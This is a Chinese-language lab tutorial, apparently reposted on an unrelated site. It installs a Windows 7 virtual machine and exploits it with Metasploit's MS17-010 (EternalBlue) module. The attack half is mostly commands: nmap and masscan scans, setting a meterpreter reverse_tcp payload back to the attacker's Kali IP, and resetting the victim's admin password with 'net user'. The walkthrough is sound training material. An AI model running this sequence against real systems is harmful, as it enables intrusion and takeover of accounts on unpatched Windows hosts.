MS17 |
您所在的位置:网站首页 › windows7那个版本可以装ps › MS17 |
WIN7虚拟机安装
1.先下载win7原装镜像 MSDN, 我告诉你 - 做一个安静的工具站 然后打开VM,把虚拟机安装进来 1.选择自定义(高级) 2.选择默认的 3.选择稍后安装系统 4.选择windows操作系统和 Win7版本 5.选择合适位置 6.选择BIOS 7.选择处理器数量 8.选择内存大小 9.选择网络类型为NET 之后都选择默认就可以了 10. 成功完成基础设置 在CD/DVD中选择我们之前下载的镜像文件 1. 2. 点击确定开机
点击接受和下一步
等待完成安装重启 取名为admin 随便输入一个密码,不记得都可以 跳过
成功进入后重启 输入命令: nmap -sP 192.168.159.1/24得到主机ip 为 192.168.159.141 2、扫描端口获得运行的服务nmap: nmap -p 1-65535 -A 192.168.159.141masscan: masscan --rate=10000 -p1-65535 192.168.159.141
命令: msfconsole寻找永恒之蓝漏洞: search ms17-0103是永恒之蓝扫描模块,探测主机是否存在永恒之蓝的漏洞 1是永恒之蓝的攻击模块,借此攻击目标用户 我们先要扫描目标是否存在永恒之漏洞 输入命令 use 3或者 use auxiliary/scanner/smb/smb_ms17_010然后查看该模块所需要的参数配置 show options
设置RHOST(攻击目标的ip) set rhosts 192.168.159.141执行扫描 run
显示主机很可能能够会受到永恒之蓝漏洞的攻击,代表我们现在可以攻击 开始攻击使用攻击模块: use 1设置payload set payload windows/x64/meterpreter/reverse_tcp查看需要配置参数 show options设置目标攻击ip(Win7主机的ip) set rhosts 192.168.159.141设置接受shell的ip(攻击机ip,kali的ip) set LHOST 192.168.159.88执行攻击 run成功拿到权限 查看系统版本 sysinfo修改密码 shell显示本地计算机的所有用户帐户列表: net user该命令用于增加或修改系统用户,以及查看它们的信息。 修改密码 net user admin 新密码 net user admin 123456 成功用123456登入 到这里就完成了基础的渗透 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |